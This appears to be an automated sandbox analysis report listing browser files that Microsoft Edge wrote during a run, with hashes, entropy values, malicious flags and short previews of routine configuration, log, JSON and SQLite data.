                                                                                                                                                                                                                                                                                                                            Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.129207364046255
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHf/J5Iq2PN723oH+Tcwt8aPrqIFUttf4XZmwDf4FkwON723oH+Tcwt8amLJ:7/RKvVaYebL3FUt94X/z4F5OaYebQJ
                                                                                                                                                                                                                                                                                                                            MD5:079558D2742CF315611C57083B9AB7AA
                                                                                                                                                                                                                                                                                                                            SHA1:8F5B470BA6693412CF1D880DFBFCC61D1E18C8B9
                                                                                                                                                                                                                                                                                                                            SHA-256:C6B3B6DBCB083AF2187B0A56DAE9EACB7F76C3763302B5031918F7B469159B7E
                                                                                                                                                                                                                                                                                                                            SHA-512:E215AD784BD6F443BB75C14921AB2437EEBB7F80153809DADC7BD75675B4BCC6F3F69901C5577B35CC360F9D8E04E05E2127DE80853CC3A23F1B062685452F92
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.415 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/05-02:39:15.416 1cd0 Recovering log #3.2025/01/05-02:39:15.416 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.135921156939598
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfrq2PN723oH+Tcwt865IFUttfzpZmwDfzjkwON723oH+Tcwt86+ULJ:7/rvVaYeb/WFUt9V/zH5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                                            MD5:A8A85F326A146FB1C5EC4976B828FC16
                                                                                                                                                                                                                                                                                                                            SHA1:664A276113449E171FD26BFAB2011F352888FC00
                                                                                                                                                                                                                                                                                                                            SHA-256:323041374863C5DFC2AD031B541976521E822DF20736D3FEAFC289E7832213BB
                                                                                                                                                                                                                                                                                                                            SHA-512:0E6D0DA217B3452813A589CCF622455A961E353141F8119F97E820FC7B43AA8DC9453E65ED1D11A7EDAF65D4E46A75DE36F3AD098378425029AC1FB6FCD96210
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.418 1cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/05-02:39:15.419 1cd0 Recovering log #3.2025/01/05-02:39:15.419 1cd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                            MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                            SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                            SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                            SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.093662902844935
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHD9yq2PN723oH+Tcwt8NIFUttDr1ZmwDD9RkwON723oH+Tcwt8+eLJ:7EvVaYebpFUtR1/75OaYebqJ
                                                                                                                                                                                                                                                                                                                            MD5:05C92A669EFF4D711B39DB15EB81A0C4
                                                                                                                                                                                                                                                                                                                            SHA1:63A8D4634C3903AC7658A8E012073827594B9D84
                                                                                                                                                                                                                                                                                                                            SHA-256:5FDA8DE3803FAF1403AE475B62E23D35B17906DB447AA7117EF9473B2531E6C4
                                                                                                                                                                                                                                                                                                                            SHA-512:F77750DF26F586C7E00B61F553381E9475B9A988CFAADDFD230CC44F1EFD34126E1E7C2A657EA1370897E4EE439310AD937B4B82D9A48B000932C5F7BF3CDD9D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.209 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/05-02:39:16.209 1dc0 Recovering log #3.2025/01/05-02:39:16.209 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):429
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018062632662178783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEZlS1FT:/M/xT02zF1V
                                                                                                                                                                                                                                                                                                                            MD5:991E70F845F3780418412CFCA85812A0
                                                                                                                                                                                                                                                                                                                            SHA1:DA09FF745EF62A49E1344245694208F27A9A64C7
                                                                                                                                                                                                                                                                                                                            SHA-256:C81BDF7309EC4828CAF0E6E3017E1DB0BD91B02309F4A630E37B322A315656D5
                                                                                                                                                                                                                                                                                                                            SHA-512:0CCB5AD20E9A97A32EF6B7F57B710346DAEBFA33D1763FCB50B51C01F9CC28CC8702C33E95D80178BBD22649AA67CC1DD675095CCDFD0272E59EB5F0D49E9DAF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):115717
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.647685644454233
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:384:aj9P0ycSQkQerR773pLQP/KbtzjlGhCgam6ItRKToaAu:adYSe2R7KP/YlGv9RKcC
                                                                                                                                                                                                                                                                                                                            MD5:91EACC3AB20EA23D2CFCBA4729A4D44A
                                                                                                                                                                                                                                                                                                                            SHA1:9F128ACB51A722BF47B1D114D3796C6D36085639
                                                                                                                                                                                                                                                                                                                            SHA-256:4078481172DB3C7C9B94F85C5E6B2C05482370C5004FCA0E40B65B536B78B129
                                                                                                                                                                                                                                                                                                                            SHA-512:69020E4842878991D4CB4A97B134CAFFABF4D7AA6738299A66D58516EF29F35D95FA341B5BA975E31F4750C067B2C8FD92E2DC260AA8407EF3C52E3E5F1C5898
                                                                                                                                                                                                                                                                                                                            Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):412
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.236978083618923
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:7zEFOvVaYeb8rcHEZrELFUtx1//n5OaYeb8rcHEZrEZSJ:7zEKVaYeb8nZrExgxx5OaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                            MD5:DCDD97362A054350D105F165ACBBBFDE
                                                                                                                                                                                                                                                                                                                            SHA1:5089AD9974CC85E46B2F625A8075B6E0B724BE61
                                                                                                                                                                                                                                                                                                                            SHA-256:79396F48389C261E178ECAE239B0A7A6173F5E36FD0BD89B82D60A3010ADD18C
                                                                                                                                                                                                                                                                                                                            SHA-512:0903ACC9F013090A4C126922440572CC895E4DD6B6F4146E5989259BDDE665A2DD4983D22CB13012E1EF6F2ED1463DF165CA52D9CA97BBD54ABE15EFB326B43F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:19.737 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/05-02:39:19.738 1de0 Recovering log #3.2025/01/05-02:39:19.738 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):671
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.48545290301778
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:Ci5TlW19YcP94hv14YOzHb6q0OSUElMRE8+RdLMeF33De8E3DJMyieO:Ci5ZW6iXZfrWF3749MyG
                                                                                                                                                                                                                                                                                                                            MD5:4A1DA70D3E47F55078134EDCDF8014CB
                                                                                                                                                                                                                                                                                                                            SHA1:2CCC438DB213A20D068A96FAE990AC0760299F9C
                                                                                                                                                                                                                                                                                                                            SHA-256:C95CD57CFCC8CC76CD77C5CBE0BA5525AC567306443D958B865F425789491E38
                                                                                                                                                                                                                                                                                                                            SHA-512:8A6D7A7866C71B2BF414673370063A5CAF852DB13930AAB759F7676EC19EFDACBA81C200DBE910E1514EEED51B171F4AC104D5F59392147FB6F168B18753F103
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:&.U3.................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1736062767822.._https://ntp.msn.com..MUID!.15B6C708283D6E590CC8D263295F6F18.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736062767756.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250103.256"}.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Sun Jan 05 2025 02:39:30 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.118981274204361
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOH9n2lL+q2PN723oH+Tcwt8a2jMGIFUtt9h11ZmwD916LVkwON723oH+Tcwt8as:7d2IvVaYeb8EFUtvh11/p1e5OaYeb8bJ
                                                                                                                                                                                                                                                                                                                            MD5:21A77E7BFBB1142AECA44BC55C1235FF
                                                                                                                                                                                                                                                                                                                            SHA1:8C12FCC51B6D78A2F81C90C5024E75AF41CE9AA6
                                                                                                                                                                                                                                                                                                                            SHA-256:91F86A14B7EFCC76266F490E9CF216C9493E2CD4EAE28CB119D4855382B80CD2
                                                                                                                                                                                                                                                                                                                            SHA-512:08BF448B96D034F1E44F31247ED1BADF99B36F2024225BEB661EA08C1395FD9A9E02A8ABB22D4FEB640608302EAE2C5E486B278722D6E31A2CEC235EE9FAF5FC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.302 1e58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:39:16.303 1e58 Recovering log #3.2025/01/05-02:39:16.308 1e58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.8731399209529376
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:te+AuOuvX3k5ExBXJydoT9GfDyc1s90Vy5:tT/vX3lb2oWDyc1s90Vu
                                                                                                                                                                                                                                                                                                                            MD5:00B5583E1B2DFC8CDD15202E6D728F1C
                                                                                                                                                                                                                                                                                                                            SHA1:91CA776ACFD6BCEBF6B90364E4BB13F636705E7E
                                                                                                                                                                                                                                                                                                                            SHA-256:B3F96918EE92FBD80A1D0B8C11A4060D2EF30BED67970854120687A26F52579F
                                                                                                                                                                                                                                                                                                                            SHA-512:09960706BD1FAC09ED7FD26E3A8EB9D0E2C575ED2266D8E72EDC9E40BB8315A4EDF4AE02BB49CD744E08FC21C3A49F95952DE83874C1DE275802B3D25934712A
                                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1746
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3024535722833015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YcCpfgCzsXtslfcKsgleeIakEsRCgHCYhbj:F2fwGLkeIakFTnh/
                                                                                                                                                                                                                                                                                                                            MD5:00D5DFC8A9239B55338DE66051BFDE64
                                                                                                                                                                                                                                                                                                                            SHA1:75588FE67AFF093FC09D4DC85C77184DDF610923
                                                                                                                                                                                                                                                                                                                            SHA-256:30A13362F5237B45D15D4418848CD6714A68588BF79158C8C5F38790D0E80002
                                                                                                                                                                                                                                                                                                                            SHA-512:5908119D57C7D5C9BA7189283C6156AA0954E9DA1BF3986386FF71BD58934980D2719072E8D0A7E81E05C78DC1827DB46844167584AA78845A3F1601E9C5F833
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128357765559","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383128360718357","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380629966283589","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.2798474187847966
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBsWd:uIEumQv8m1ccnvS61TYiiP51a
                                                                                                                                                                                                                                                                                                                            MD5:E1A187F95B08E58B8482D90D7ACE701C
                                                                                                                                                                                                                                                                                                                            SHA1:7E55C8743B651AAC8CC19604B1BA9BF5D5B57773
                                                                                                                                                                                                                                                                                                                            SHA-256:CB94BAFB68D988265366D3583155371A1BC4E7B8F147EF629A11860DB2180409
                                                                                                                                                                                                                                                                                                                            SHA-512:5C87EDDF1970AC2129A9CCE10B1C748FB3DCA6616BF2CFCD6397E7CC8177C4BD9077B95FED7FC0FBAB294946F517D9337374108F99B2AE8E46D5C33DF84EAB03
                                                                                                                                                                                                                                                                                                                            Malicious:false
Preview:SQLite format 3 [binary header bytes omitted]
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[]
